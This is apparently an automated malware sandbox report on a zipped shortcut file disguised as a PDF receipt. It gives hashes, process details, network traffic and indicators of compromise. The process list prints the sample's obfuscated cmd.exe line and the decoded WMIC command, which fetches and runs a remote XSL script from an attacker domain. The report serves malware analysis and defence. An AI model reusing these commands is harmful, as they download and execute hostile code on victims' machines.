analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Comprovante.3179.pdf.zip

Full analysis: https://app.any.run/tasks/04cd0a16-ea0c-454b-83e1-07a775b13d27
Verdict: Malicious activity
Analysis date: April 24, 2019, 07:25:07
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract
MD5:

1B5804F0F512FFCCD1553D71F3D81556

SHA1:

EB2D9280025E50F2BAB24423E6389D9C7587B3D2

SHA256:

63FD22795246EEF50AB842984F31588D124D097526EEDF90A961D59C51A5DD69

SSDEEP:

24:9ePYQV4SxELpNhK4WgAIlwtOmeXzyVTCYgf9Oly1NrISY4PLYqrCUb:9KYA4SxEThKSAI6PemoYSO6N3/PLf/b

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Runs app for hidden code execution

      • cmd.exe (PID: 2360)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2360)
    • Creates files in the user directory

      • WMIC.exe (PID: 3464)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: -
ZipCompression: Deflated
ZipModifyDate: 2019:04:24 07:21:08
ZipCRC: 0x03bd1eb1
ZipCompressedSize: 961
ZipUncompressedSize: 3100
ZipFileName: Comprovante.3179.pdf.lnk
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
38
Monitored processes
5
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs wmic.exe

Process information

PID
CMD
Path
Indicators
Parent process
2796"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Comprovante.3179.pdf.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
2360"C:\Windows\System32\cmd.exe" /V /C "set x=C[4988]:\\[4988]Wi[4988]nd[4988]ow[4988]s\\s[4988]ys[4988]te[4988]m3[4988]2[4988]\\[4988]wbe[4988]m\\W[4988]M[4988]I[4988]C.e[4988]x[4988]e o[4988]s g[4988]e[4988]t hj[4988]6lu[4988]90a[4988]U[4988], fr[4988]e[4988]e[4988]vi[4988]rt[4988]ua[4988]lme[4988]mor[4988]y /[4988]form[4988]at:"h[4988]t[4988]t[4988]p[4988]:[4988]/[4988]/mm[4988]e[4988]f[4988]7[4988]8[4988]iq[4988]k.[4988]ul[4988]tr[4988]apo[4988]wer[4988]06.[4988]x[4988]y[4988]z[4988]:[4988]2[4988]5[4988]08[4988]6/0[4988]9/?[4988]1[4988]3[4988]8[4988]0[4988]2[4988]5[4988]08[4988]6i[4988]q3[4988]9E[4988]LKi[4988]z" &&echo %x:[4988]=%|C:\Windows\system32\cmd.exe"C:\Windows\System32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2952C:\Windows\system32\cmd.exe /S /D /c" echo %x:[4988]=%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3028C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3464C:\\Windows\\system32\\wbem\\WMIC.exe os get hj6lu90aU, freevirtualmemory /format:"http://mmef78iqk.ultrapower06.xyz:25086/09/?138025086iq39ELKiz" C:\Windows\system32\wbem\WMIC.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
44210
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
526
Read events
490
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
3
Unknown types
1

Dropped files

PID
Process
Filename
Type
3464WMIC.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][1].txt
MD5:
SHA256:
3464WMIC.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@google[1].txt
MD5:
SHA256:
2796WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa2796.23281\Comprovante.3179.pdf.lnklnk
MD5:D0C0E05C37D77F1D03D39E86DB4D5A3B
SHA256:0ACB1E4A9A5931F745929BDE55EE08EFED9308ED06DD2D8960762874BB71E153
3464WMIC.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\[email protected][2].txttext
MD5:86B3F4F7A9D6DE832E78ECE790394C30
SHA256:C147B3C5E4F4D6A33D44D943570E2558EDAB42E40E8E084B528CAB97AA31232A
3464WMIC.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@google[2].txttext
MD5:979C57101E7E010A505508AB87572A1C
SHA256:7CDC91E655A459A97C4DF774074DCA556E792178FF28E0BB202E234DCF3AAC08
3464WMIC.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\google_com[1].txthtml
MD5:5AC5A0AE4E88D7B868832DCDE5F4B841
SHA256:355B5731880F98196731986651729C05CFABFBDE8780071B2F0979B44B7C639C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3464
WMIC.exe
GET
302
35.235.81.160:25086
http://mmef78iqk.ultrapower06.xyz:25086/09/?138025086iq39ELKiz.xsl
US
html
319 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3464
WMIC.exe
35.235.81.160:25086
mmef78iqk.ultrapower06.xyz
US
unknown
3464
WMIC.exe
216.58.210.4:443
www.google.com
Google Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
mmef78iqk.ultrapower06.xyz
  • 35.235.81.160
unknown
www.google.com
  • 216.58.210.4
whitelisted

Threats

No threats detected
No debug info